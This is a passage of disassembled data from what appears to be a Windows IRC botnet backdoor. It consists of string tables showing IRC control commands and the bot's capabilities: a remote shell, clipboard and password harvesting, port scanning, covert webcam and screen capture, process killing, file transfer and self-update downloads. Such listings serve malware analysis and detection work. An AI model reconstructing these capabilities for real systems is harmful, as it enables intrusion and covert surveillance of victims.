aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_40D2E0:loc_412FD0�o
align 4
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_40D2E0+5CC8�o
align 4
dword_42B2E8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+5C76�o
dd 2BBBB02h
aStatusReady_Bo db ' Status: Ready. Bot Uptime: %s.',0
align 4
dword_42B324 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+5C62�o
dd 2BBBB02h, 6F422020h, 44492074h, 7325203Ah, 2Eh
dword_42B34C dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40D2E0+5C3D�o
dd 2029671Fh, 2BBBB02h
aFailedToStartL db ' Failed to start list thread, error: <%d>.',0
dword_42B394 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40D2E0+5BD2�o
dd 2029671Fh, 2BBBB02h, 694C2020h, 74207473h, 61657268h
dd 2E7364h
dword_42B3C0 dd 627573h ; DATA XREF: sub_40D2E0+5BAC�o
dword_42B3C4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+5B5D�o
dd 2BBBB02h, 6C412020h, 20736169h, 7473696Ch, 2Eh
dword_42B3EC dd 7A026E02h, 201F6D1Fh, 676F6C28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+5B42�o
dd 2BBBB02h
aFailedToStar_8 db ' Failed to start listing thread, error: <%d>.',0
align 4
dword_42B434 dd 7A026E02h, 201F6D1Fh, 676F6C28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+5AD3�o
dd 2BBBB02h, 694C2020h, 6E697473h, 6F6C2067h, 2E67h
dword_42B45C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+5A36�o
dd 2BBBB02h, 654E2020h, 726F7774h, 6E49206Bh, 2E6F66h
dword_42B484 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+5A04�o
dd 2BBBB02h, 79532020h, 6D657473h, 666E4920h, 2E6Fh
dword_42B4AC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+59AF�o
dd 2BBBB02h, 65522020h, 69766F6Dh, 4220676Eh, 2E746Fh
unk_42B4D4 db 2 ; DATA XREF: sub_40D2E0+599C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToStar_9 db 'Failed to start listing thread, error: <%d>.',0
align 4
dword_42B524 dd 7A026E02h, 201F6D1Fh, 6F727028h, 73736563h, 702E7365h
; DATA XREF: sub_40D2E0+592D�o
dd 671F6C1Fh, 0BB022029h, 202002BBh, 636F7250h, 73736563h
dd 73696C20h, 2E74h
aFull db 'full',0 ; DATA XREF: sub_40D2E0+590D�o
align 4
unk_42B55C db 2 ; DATA XREF: sub_40D2E0+58B6�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aAlreadyRunning db 'Already running.',0
align 10h
unk_42B590 db 2 ; DATA XREF: sub_40D2E0+5893�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 64h, 6Bh
db 65h ; e
db 79h, 73h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aSearchComplete db ' Search completed.',0
align 10h
dword_42B5C0 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+584A�o
dd 2BBBB02h, 70552020h, 656D6974h, 7325203Ah, 2Eh
dword_42B5E8 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0:loc_412A67�o
dd 2BBBB02h
aRemoteShellRea db ' Remote shell ready.',0
align 4
dword_42B618 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+5780�o
dd 2BBBB02h
aCouldnTOpenRem db ' Couldn',27h,'t open remote shell.',0
align 10h
dword_42B650 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+5764�o
dd 2BBBB02h
aRemoteShellAlr db ' Remote shell already running.',0
dword_42B688 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+5746�o
dd 2BBBB02h, 65472020h, 6C432074h, 6F627069h, 2E647261h
dd 0
aClipboardData db '-[Clipboard Data]-',0 ; DATA XREF: sub_40D2E0+5718�o
align 4
unk_42B6C8 db 2 ; DATA XREF: sub_40D2E0:loc_4129E8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToFlushA db ' Failed to flush ARP cache.',0
align 4
unk_42B704 db 2 ; DATA XREF: sub_40D2E0+56ED�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aArpCacheFlushe db ' ARP cache flushed.',0
align 4
unk_42B738 db 2 ; DATA XREF: sub_40D2E0:loc_4129BD�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToLoadDn db ' Failed to load dnsapi.dll.',0
align 4
unk_42B774 db 2 ; DATA XREF: sub_40D2E0:loc_4129B6�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToFlushD db ' Failed to flush DNS cache.',0
align 10h
unk_42B7B0 db 2 ; DATA XREF: sub_40D2E0+56CF�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDnsCacheFlushe db ' DNS cache flushed.',0
align 4
dword_42B7E4 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_40D2E0+565F�o
dd 2029671Fh, 2BBBB02h
aFailedToSta_10 db ' Failed to start server thread, error: <%d>.',0
align 10h
dword_42B830 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_40D2E0+55F4�o
dd 2029671Fh, 2BBBB02h
aServerListen_0 db ' Server listening on IP: %s:%d, Username: %s.',0
align 4
unk_42B87C db 2 ; DATA XREF: sub_40D2E0+5528�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToSta_11 db 'Failed to start server thread, error: <%d>.',0
unk_42B8C4 db 2 ; DATA XREF: sub_40D2E0+53B2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_12 db ' Failed to start server thread, error: <%d>.',0
align 4
unk_42B90C db 2 ; DATA XREF: sub_40D2E0+5287�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aAlreadyRunni_0 db ' Already running.',0
unk_42B938 db 2 ; DATA XREF: sub_40D2E0+5271�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_13 db ' Failed to start search thread, error: <%d>.',0
unk_42B984 db 2 ; DATA XREF: sub_40D2E0+5200�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSearchingForPa db ' Searching for password.',0
unk_42B9BC db 2 ; DATA XREF: sub_40D2E0:loc_4124A7�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_14 db ' Failed to start scan, port is invalid.',0
align 10h
unk_42BA00 db 2 ; DATA XREF: sub_40D2E0+5108�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSPortScanStart db ' %s Port Scan started on %s:%d with a delay of %d seconds for %d'
db ' minutes using %d threads.',0
align 4
dword_42BA78 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+4EC8�o
dd 2BBBB02h
aNickChangedToS db ' Nick changed to: ',27h,'%s',27h,'.',0
align 4
dword_42BAAC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+4EAC�o
dd 2BBBB02h
aJoinedChannelS db ' Joined channel: ',27h,'%s',27h,'.',0
dword_42BADC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+4E89�o
dd 2BBBB02h
aPartedChannelS db ' Parted channel: ',27h,'%s',27h,'.',0
dword_42BB0C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+4E6D�o
dd 2BBBB02h, 52492020h, 61522043h, 25203A77h, 2E73h
dword_42BB34 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40D2E0:loc_4120CC�o
dd 2029671Fh, 2BBBB02h
aFailedToKillTh db ' Failed to kill thread: %s.',0
align 10h
dword_42BB70 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40D2E0+4DE5�o
dd 2029671Fh, 2BBBB02h
aKilledThreadS_ db ' Killed thread: %s.',0
align 4
dword_42BBA4 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40D2E0:loc_41207F�o
dd 2029671Fh, 2BBBB02h
aNoActiveThread db ' No active threads found.',0
align 4
dword_42BBDC dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40D2E0+4D86�o
dd 2029671Fh, 2BBBB02h
aStoppedDThread db ' Stopped: %d thread(s).',0
align 4
aAll db 'all',0 ; DATA XREF: sub_40D2E0+4D6C�o
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_40D2E0+4CE1�o
; sub_40D2E0:loc_412FBA�o
align 4
dword_42BC28 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+4C68�o
dd 2BBBB02h
aPrefixChangedT db ' Prefix changed to: ',27h,'%c',27h,'.',0
align 4
unk_42BC5C db 3 ; DATA XREF: sub_40D2E0:loc_411F33�o
db 31h, 35h, 2Ch
db 31h ; 1
db 34h, 6Eh, 7Ah
db 6Dh ; m
db 20h, 3, 32h
db 2Eh ; .
db 2Eh, 20h, 3
db 31h ; 1
db 35h, 28h, 73h
db 68h ; h
db 65h, 2 dup(6Ch)
db 3
db 32h, 2Eh, 3
db 31h ; 1
db 35h, 6Dh, 6Fh
db 64h ; d
db 29h, 20h, 3
db 32h ; 2
db 0BBh, 3, 31h
a5CouldnTOpenFi db '5 Couldn',27h,'t open file: %s',0
align 10h
unk_42BCA0 db 3 ; DATA XREF: sub_40D2E0+4C49�o
db 31h, 35h, 2Ch
db 31h ; 1
db 34h, 6Eh, 7Ah
db 6Dh ; m
db 20h, 3, 32h
db 2Eh ; .
db 2Eh, 20h, 3
db 31h ; 1
db 35h, 28h, 73h
db 68h ; h
db 65h, 2 dup(6Ch)
db 3
db 32h, 2Eh, 3
db 31h ; 1
db 35h, 6Dh, 6Fh
db 64h ; d
db 29h, 20h, 3
db 32h ; 2
db 0BBh, 3, 31h
a5FileOpenedS db '5 File opened: %s',0
align 4
dword_42BCDC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+4C29�o
dd 2BBBB02h
aServerChangedT db ' Server changed to: ',27h,'%s',27h,'.',0
align 10h
dword_42BD10 dd 7A026E02h, 201F6D1Fh, 736E6428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0:loc_411EBD�o
dd 2BBBB02h
aCouldnTResol_0 db ' Couldn',27h,'t resolve hostname.',0
align 4
dword_42BD48 dd 7A026E02h, 201F6D1Fh, 736E6428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+4BB2�o
dd 2BBBB02h
aLookupSS_ db ' Lookup: %s -> %s.',0
unk_42BD74 db 2 ; DATA XREF: sub_40D2E0:loc_411E5E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToTermin db 'Failed to terminate process: %s',0
unk_42BDB4 db 2 ; DATA XREF: sub_40D2E0+4B74�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aProcessKilledS db 'Process killed: %s',0
align 4
unk_42BDE8 db 2 ; DATA XREF: sub_40D2E0:loc_411DFE�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToTerm_0 db 'Failed to terminate process ID: %s',0
align 4
unk_42BE2C db 2 ; DATA XREF: sub_40D2E0+4B17�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aProcessKilledI db 'Process killed ID: %s',0
align 4
dword_42BE64 dd 7A026E02h, 201F6D1Fh, 6C696628h, 1F702E65h, 29671F6Ch
; DATA XREF: sub_40D2E0+4AD2�o
dd 0BBBB0220h, 44202002h, 74656C65h, 27206465h, 2E277325h
dd 0
dword_42BE90 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+4A4D�o
dd 2BBBB02h
aSendFileSUserS db ' Send File: %s, User: %s.',0
align 4
dword_42BEC4 dd 7A026E02h, 201F6D1Fh, 6C696628h, 1F702E65h, 29671F6Ch
; DATA XREF: sub_40D2E0+49D2�o
dd 0BBBB0220h, 4C202002h, 3A747369h, 732520h
unk_42BEE8 db 2 ; DATA XREF: sub_40D2E0+49B4�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 76h, 69h, 73h
db 69h ; i
db 74h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToSta_15 db 'Failed to start connection thread, error: <%d>.',0
dword_42BF34 dd 7A026E02h, 201F6D1Fh, 73697628h, 702E7469h, 671F6C1Fh
; DATA XREF: sub_40D2E0+4945�o
dd 0BB022029h, 202002BBh, 3A4C5255h, 2E732520h, 0
dword_42BF5C dd 7A026E02h, 201F6D1Fh, 72696D28h, 1F702E63h, 29671F6Ch
; DATA XREF: sub_40D2E0:loc_411BB3�o
dd 0BBBB0220h, 43202002h, 616D6D6Fh, 7320646Eh, 2E746E65h
dd 0
unk_42BF88 db 2 ; DATA XREF: sub_40D2E0+48C9�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Dh, 69h, 72h
db 63h ; c
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aClientNotOpen_ db ' Client not open.',0
dword_42BFB4 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+4898�o
dd 2BBBB02h, 6F432020h, 6E616D6Dh, 203A7364h, 7325h
dword_42BFDC dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+488D�o
dd 2BBBB02h
aErrorSendingTo db ' Error sending to remote shell.',0
align 4
dword_42C018 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+484D�o
dd 2BBBB02h
aReadFileFailed db ' Read file failed: %s',0
align 4
dword_42C048 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+4839�o
dd 2BBBB02h
aReadFileComple db ' Read file complete: %s',0
align 4
dword_42C07C dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40D2E0:loc_411AA7�o
dd 2029671Fh, 2BBBB02h
aInvalidParam_0 db ' Invalid parameters for amateur video capture.',0
dword_42C0C8 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40D2E0:loc_411A9D�o
dd 2029671Fh, 2BBBB02h
aErrorWhileCapt db ' Error while capturing amateur video from webcam.',0
align 4
dword_42C118 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40D2E0+47B3�o
dd 2029671Fh, 2BBBB02h
aAmateurVideoSa db ' Amateur video saved to: %s.',0
align 4
aVideo db 'video',0 ; DATA XREF: sub_40D2E0:loc_411A0E�o
align 4
dword_42C15C dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40D2E0:loc_4119FB�o
dd 2029671Fh, 2BBBB02h
aInvalidParam_1 db ' Invalid parameters for webcam capture.',0
align 4
dword_42C1A4 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40D2E0:loc_4119F4�o
dd 2029671Fh, 2BBBB02h
aErrorWhileCa_0 db ' Error while capturing from webcam.',0
align 4
dword_42C1E8 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40D2E0+4704�o
dd 2029671Fh, 2BBBB02h
aWebcamCaptureS db ' Webcam capture saved to: %s.',0
align 4
aFrame db 'frame',0 ; DATA XREF: sub_40D2E0:loc_411968�o
align 4
dword_42C22C dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40D2E0+467B�o
dd 2029671Fh, 2BBBB02h
aDriverListComp db ' Driver list complete.',0
dword_42C260 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40D2E0+4645�o
dd 2029671Fh, 2BBBB02h
aDriverDSS_ db ' Driver #%d - %s - %s.',0
aDrivers db 'drivers',0 ; DATA XREF: sub_40D2E0:loc_4118D1�o
dword_42C29C dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40D2E0:loc_4118BE�o
dd 2029671Fh, 2BBBB02h
aNoFilenameSpec db ' No filename specified for screen capture.',0
dword_42C2E4 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40D2E0:loc_4118B7�o
dd 2029671Fh, 2BBBB02h
aErrorWhileCa_1 db ' Error while capturing screen.',0
dword_42C320 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40D2E0+45C7�o
dd 2029671Fh, 2BBBB02h
aScreenCaptureS db ' Screen capture saved to: %s.',0
align 4
aScreen db 'screen',0 ; DATA XREF: sub_40D2E0:loc_41186E�o
align 4
dword_42C364 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+4576�o
dd 2BBBB02h, 65472020h, 736F6874h, 25203A74h, 2E73h
dword_42C38C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+4532�o
dd 2BBBB02h
aUnableToExtrac db ' Unable to extract Gethost command.',0
align 4
dword_42C3CC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+4516�o
dd 2BBBB02h
aGethostSComman db ' Gethost: %s, Command: %s',0
align 10h
dword_42C400 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+4496�o
dd 2BBBB02h
aAliasAddedS_ db ' Alias added: %s.',0
align 4
dword_42C42C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+445F�o
dd 2BBBB02h
aPrivmsgSS_ db ' Privmsg: %s: %s.',0
align 4
dword_42C458 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+4411�o
dd 2BBBB02h
aActionSS_ db ' Action: %s: %s.',0
align 4
dword_42C484 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+43A0�o
dd 2BBBB02h, 79432020h, 2E656C63h, 0
dword_42C4A8 dd 54524150h, 0D732520h, 0Ah ; DATA XREF: sub_40D2E0+4366�o
; sub_40D2E0+4E78�o
dword_42C4B4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+433F�o
dd 2BBBB02h
aModeChangeS db ' Mode change: %s',0
align 10h
aModeS db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_40D2E0+432E�o
align 4
dword_42C4EC dd 7A026E02h, 201F6D1Fh, 6F6C6328h, 2E73656Eh, 1F6C1F70h
; DATA XREF: sub_40D2E0+4305�o
dd 2202967h, 2002BBBBh, 77615220h, 73252820h, 25203A29h
dd 73h
dword_42C518 dd 7A026E02h, 201F6D1Fh, 6F6C6328h, 2E73656Eh, 1F6C1F70h
; DATA XREF: sub_40D2E0+4297�o
dd 2202967h, 2002BBBBh, 646F4D20h, 25282065h, 203A2973h
dd 7325h
dword_42C544 dd 45444F4Dh, 732520h ; DATA XREF: sub_40D2E0+423F�o
dword_42C54C dd 7A026E02h, 201F6D1Fh, 6F6C6328h, 2E73656Eh, 1F6C1F70h
; DATA XREF: sub_40D2E0+4212�o
dd 2202967h, 2002BBBBh, 63694E20h, 2528206Bh, 203A2973h
dd 7325h
dword_42C578 dd 4B43494Eh, 732520h ; DATA XREF: sub_40D2E0+41B9�o
; sub_40D2E0+4CAD�o
dword_42C580 dd 4E494F4Ah, 20732520h, 7325h ; DATA XREF: sub_40D2E0+419A�o
dword_42C58C dd 0A0D7325h, 0 ; DATA XREF: sub_40D2E0+4165�o
; sub_40D2E0+41EE�o ...
dword_42C594 dd 54524150h, 732520h ; DATA XREF: sub_40D2E0+4130�o
dword_42C59C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0:loc_4113FD�o
dd 2BBBB02h
aRepeatNotAllow db ' Repeat not allowed in command line: %s',0
align 10h
dword_42C5E0 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0+40E6�o
dd 2BBBB02h, 65522020h, 74616570h, 7325203Ah, 0
aRepeat db 'repeat',0 ; DATA XREF: sub_40D2E0+4092�o
align 10h
dword_42C610 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40D2E0:loc_41132A�o
dd 2BBBB02h, 65442020h, 2E79616Ch, 0
dword_42C634 dd 25207325h, 73252073h, 73253A20h, 0 ; DATA XREF: sub_40D2E0+400A�o
; sub_40D2E0+40BD�o ...
unk_42C644 db 2 ; DATA XREF: sub_40D2E0:loc_411297�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 75h, 70h, 64h
db 61h ; a
db 74h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aBotIdMustBeDif db ' Bot ID must be different than current running process.',0
unk_42C698 db 2 ; DATA XREF: sub_40D2E0+3FAD�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 75h, 70h, 64h
db 61h ; a
db 74h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToStartD db ' Failed to start download thread, error: <%d>.',0
align 4
unk_42C6E4 db 2 ; DATA XREF: sub_40D2E0+3F3E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 75h, 70h, 64h
db 61h ; a
db 74h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aDownloadingUpd db ' Downloading update from: %s.',0
align 10h
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_40D2E0+3E95�o
align 4
dword_42C72C dd 7A026E02h, 201F6D1Fh, 65786528h, 1F702E63h, 29671F6Ch
; DATA XREF: sub_40D2E0+3E33�o
dd 0BBBB0220h, 43202002h, 616D6D6Fh, 3A73646Eh, 732520h
unk_42C754 db 2 ; DATA XREF: sub_40D2E0+3E28�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 65h, 78h, 65h
db 63h ; c
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
